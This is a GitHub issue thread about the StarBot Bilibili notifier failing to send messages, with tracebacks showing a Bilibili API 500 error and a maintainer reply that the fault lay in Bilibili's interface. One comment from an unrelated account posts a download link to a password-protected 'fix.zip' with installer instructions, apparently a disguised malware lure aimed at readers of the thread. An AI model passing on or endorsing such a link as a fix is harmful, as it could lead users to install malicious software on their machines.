### ISSUE TITLE
消息发送失败

### ISSUE THREAD

**Issue by HanamiSeishin** [Starlwr/StarBot#21]
starbot版本：2.0.10

```
2024-08-26 02:54:13.379 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : 东爱璃Lovely 发表了新动态\nhttps://t.bilibili.com/969690413017333763\n[图片]
2024-08-26 02:54:45.401 | INFO     | starbot.core.room:265 | [下播] 东爱璃Lovely (21692711)
2024-08-26 02:54:47.128 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : 东爱璃Lovely 直播结束了
2024-08-26 02:54:56.173 | WARNING  | graia.ariadne.app:1720 | Failed to send message, your account may be blocked.
2024-08-26 02:54:56.173 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : [图片]
2024-08-26 12:27:08.085 | INFO     | starbot.core.room:417 | [动态更新] 特莉丝忒
2024-08-26 12:42:56.233 | ERROR    | graia.ariadne.util:126 | Task exception was never retrieved
future: <Task finished name='Task-2820323' coro=<Up.dynamic_update() done, defined at /home/starbot/starbot/core/room.py:412> exception=ResponseCodeException("Cannot read property 'danmaku' of undefined")>
Traceback (most recent call last):

> File "/home/starbot/starbot/core/room.py", line 442, in dynamic_update
    base64str = await DynamicPicGenerator.generate(event)
                      │                   │        └ {'desc': {'uid': 651649, 'type': 8, 'rid': 113026392982732, 'acl': 0, 'view': 1, 'repost': 0, 'comment': 0, 'like': 0, 'is_li...
                      │                   └ <classmethod object at 0x7efd0fc68250>
                      └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>

  File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 65, in generate
    await cls.__draw_by_type(pic, dynamic_type, card, dynamic_id, display,
          │                  │    │             │     │           └ {'origin': None, 'usr_action_txt': '投稿了视频', 'relation': {'status': 2, 'is_follow': 1, 'is_followed': 0}, 'live_info': None, '...
          │                  │    │             │     └ 969838052492967941
          │                  │    │             └ {'aid': 113026392982732, 'cid': 500001662567043, 'ctime': 1724646418, 'desc': '', 'dimension': {'height': 1080, 'rotate': 0, ...
          │                  │    └ 8
          │                  └ <starbot.painter.PicGenerator.PicGenerator object at 0x7efcf42e0e20>
          └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>

  File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 190, in __draw_by_type
    modules = (await request("GET", modules_url, credential=get_credential()))["item"]["modules"]["module_dynamic"]["desc"]
                     │              │                       └ <function get_credential at 0x7efd0fcc8b80>
                     │              └ 'https://api.bilibili.com/x/polymer/web-dynamic/v1/detail?timezone_offset=-480&id=969838052492967941'
                     └ <function request at 0x7efd1022fe50>

  File "/home/starbot/starbot/utils/network.py", line 168, in request
    raise ResponseCodeException(code, msg, resp_data)
          │                     │     │    └ {'code': 500, 'message': "Cannot read property 'danmaku' of undefined", 'ttl': 1}
          │                     │     └ "Cannot read property 'danmaku' of undefined"
          │                     └ 500
          └ <class 'starbot.exception.ResponseCodeException.ResponseCodeException'>

starbot.exception.ResponseCodeException.ResponseCodeException: 接口返回错误代码: 500, 信息: Cannot read property 'danmaku' of undefined
2024-08-26 12:42:56.375 | INFO     | starbot.core.room:417 | [动态更新] 特莉丝忒
2024-08-26 12:48:22.381 | ERROR    | graia.ariadne.util:126 | Task exception was never retrieved
future: <Task finished name='Task-2822143' coro=<Up.dynamic_update() done, defined at /home/starbot/starbot/core/room.py:412> exception=ResponseCodeException("Cannot read property 'danmaku' of undefined")>
Traceback (most recent call last):

> File "/home/starbot/starbot/core/room.py", line 442, in dynamic_update
    base64str = await DynamicPicGenerator.generate(event)
                      │                   │        └ {'desc': {'uid': 651649, 'type': 8, 'rid': 113026460091223, 'acl': 0, 'view': 0, 'repost': 0, 'comment': 0, 'like': 0, 'is_li...
                      │                   └ <classmethod object at 0x7efd0fc68250>
                      └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>

  File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 65, in generate
    await cls.__draw_by_type(pic, dynamic_type, card, dynamic_id, display,
          │                  │    │             │     │           └ {'origin': None, 'usr_action_txt': '投稿了视频', 'relation': {'status': 2, 'is_follow': 1, 'is_followed': 0}, 'live_info': None, '...
          │                  │    │             │     └ 969842149898059794
          │                  │    │             └ {'aid': 113026460091223, 'cid': 500001662581334, 'ctime': 1724647372, 'desc': '', 'dimension': {'height': 1080, 'rotate': 0, ...
          │                  │    └ 8
          │                  └ <starbot.painter.PicGenerator.PicGenerator object at 0x7efcf5fb8f70>
          └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>

  File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 190, in __draw_by_type
    modules = (await request("GET", modules_url, credential=get_credential()))["item"]["modules"]["module_dynamic"]["desc"]
                     │              │                       └ <function get_credential at 0x7efd0fcc8b80>
                     │              └ 'https://api.bilibili.com/x/polymer/web-dynamic/v1/detail?timezone_offset=-480&id=969842149898059794'
                     └ <function request at 0x7efd1022fe50>

  File "/home/starbot/starbot/utils/network.py", line 168, in request
    raise ResponseCodeException(code, msg, resp_data)
          │                     │     │    └ {'code': 500, 'message': "Cannot read property 'danmaku' of undefined", 'ttl': 1}
          │                     │     └ "Cannot read property 'danmaku' of undefined"
          │                     └ 500
          └ <class 'starbot.exception.ResponseCodeException.ResponseCodeException'>

starbot.exception.ResponseCodeException.ResponseCodeException: 接口返回错误代码: 500, 信息: Cannot read property 'danmaku' of undefined
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HanamiSeishin** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> 这是

不知道这是啥欸

**Comment by Starlwr** [comment]
> starbot版本：2.0.10
> 
> ```
> 2024-08-26 02:54:13.379 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : 东爱璃Lovely 发表了新动态\nhttps://t.bilibili.com/969690413017333763\n[图片]
> 2024-08-26 02:54:45.401 | INFO     | starbot.core.room:265 | [下播] 东爱璃Lovely (21692711)
> 2024-08-26 02:54:47.128 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : 东爱璃Lovely 直播结束了
> 2024-08-26 02:54:56.173 | WARNING  | graia.ariadne.app:1720 | Failed to send message, your account may be blocked.
> 2024-08-26 02:54:56.173 | INFO     | starbot.core.sender:172 | 1519998361 -> 群[778011202] : [图片]
> 2024-08-26 12:27:08.085 | INFO     | starbot.core.room:417 | [动态更新] 特莉丝忒
> 2024-08-26 12:42:56.233 | ERROR    | graia.ariadne.util:126 | Task exception was never retrieved
> future: <Task finished name='Task-2820323' coro=<Up.dynamic_update() done, defined at /home/starbot/starbot/core/room.py:412> exception=ResponseCodeException("Cannot read property 'danmaku' of undefined")>
> Traceback (most recent call last):
> 
> > File "/home/starbot/starbot/core/room.py", line 442, in dynamic_update
>     base64str = await DynamicPicGenerator.generate(event)
>                       │                   │        └ {'desc': {'uid': 651649, 'type': 8, 'rid': 113026392982732, 'acl': 0, 'view': 1, 'repost': 0, 'comment': 0, 'like': 0, 'is_li...
>                       │                   └ <classmethod object at 0x7efd0fc68250>
>                       └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>
> 
>   File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 65, in generate
>     await cls.__draw_by_type(pic, dynamic_type, card, dynamic_id, display,
>           │                  │    │             │     │           └ {'origin': None, 'usr_action_txt': '投稿了视频', 'relation': {'status': 2, 'is_follow': 1, 'is_followed': 0}, 'live_info': None, '...
>           │                  │    │             │     └ 969838052492967941
>           │                  │    │             └ {'aid': 113026392982732, 'cid': 500001662567043, 'ctime': 1724646418, 'desc': '', 'dimension': {'height': 1080, 'rotate': 0, ...
>           │                  │    └ 8
>           │                  └ <starbot.painter.PicGenerator.PicGenerator object at 0x7efcf42e0e20>
>           └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>
> 
>   File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 190, in __draw_by_type
>     modules = (await request("GET", modules_url, credential=get_credential()))["item"]["modules"]["module_dynamic"]["desc"]
>                      │              │                       └ <function get_credential at 0x7efd0fcc8b80>
>                      │              └ 'https://api.bilibili.com/x/polymer/web-dynamic/v1/detail?timezone_offset=-480&id=969838052492967941'
>                      └ <function request at 0x7efd1022fe50>
> 
>   File "/home/starbot/starbot/utils/network.py", line 168, in request
>     raise ResponseCodeException(code, msg, resp_data)
>           │                     │     │    └ {'code': 500, 'message': "Cannot read property 'danmaku' of undefined", 'ttl': 1}
>           │                     │     └ "Cannot read property 'danmaku' of undefined"
>           │                     └ 500
>           └ <class 'starbot.exception.ResponseCodeException.ResponseCodeException'>
> 
> starbot.exception.ResponseCodeException.ResponseCodeException: 接口返回错误代码: 500, 信息: Cannot read property 'danmaku' of undefined
> 2024-08-26 12:42:56.375 | INFO     | starbot.core.room:417 | [动态更新] 特莉丝忒
> 2024-08-26 12:48:22.381 | ERROR    | graia.ariadne.util:126 | Task exception was never retrieved
> future: <Task finished name='Task-2822143' coro=<Up.dynamic_update() done, defined at /home/starbot/starbot/core/room.py:412> exception=ResponseCodeException("Cannot read property 'danmaku' of undefined")>
> Traceback (most recent call last):
> 
> > File "/home/starbot/starbot/core/room.py", line 442, in dynamic_update
>     base64str = await DynamicPicGenerator.generate(event)
>                       │                   │        └ {'desc': {'uid': 651649, 'type': 8, 'rid': 113026460091223, 'acl': 0, 'view': 0, 'repost': 0, 'comment': 0, 'like': 0, 'is_li...
>                       │                   └ <classmethod object at 0x7efd0fc68250>
>                       └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>
> 
>   File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 65, in generate
>     await cls.__draw_by_type(pic, dynamic_type, card, dynamic_id, display,
>           │                  │    │             │     │           └ {'origin': None, 'usr_action_txt': '投稿了视频', 'relation': {'status': 2, 'is_follow': 1, 'is_followed': 0}, 'live_info': None, '...
>           │                  │    │             │     └ 969842149898059794
>           │                  │    │             └ {'aid': 113026460091223, 'cid': 500001662581334, 'ctime': 1724647372, 'desc': '', 'dimension': {'height': 1080, 'rotate': 0, ...
>           │                  │    └ 8
>           │                  └ <starbot.painter.PicGenerator.PicGenerator object at 0x7efcf5fb8f70>
>           └ <class 'starbot.painter.DynamicPicGenerator.DynamicPicGenerator'>
> 
>   File "/home/starbot/starbot/painter/DynamicPicGenerator.py", line 190, in __draw_by_type
>     modules = (await request("GET", modules_url, credential=get_credential()))["item"]["modules"]["module_dynamic"]["desc"]
>                      │              │                       └ <function get_credential at 0x7efd0fcc8b80>
>                      │              └ 'https://api.bilibili.com/x/polymer/web-dynamic/v1/detail?timezone_offset=-480&id=969842149898059794'
>                      └ <function request at 0x7efd1022fe50>
> 
>   File "/home/starbot/starbot/utils/network.py", line 168, in request
>     raise ResponseCodeException(code, msg, resp_data)
>           │                     │     │    └ {'code': 500, 'message': "Cannot read property 'danmaku' of undefined", 'ttl': 1}
>           │                     │     └ "Cannot read property 'danmaku' of undefined"
>           │                     └ 500
>           └ <class 'starbot.exception.ResponseCodeException.ResponseCodeException'>
> 
> starbot.exception.ResponseCodeException.ResponseCodeException: 接口返回错误代码: 500, 信息: Cannot read property 'danmaku' of undefined
> ```

这个错误是b站的接口内部报错了，目前测试b站已经修复了，可以再观察一下
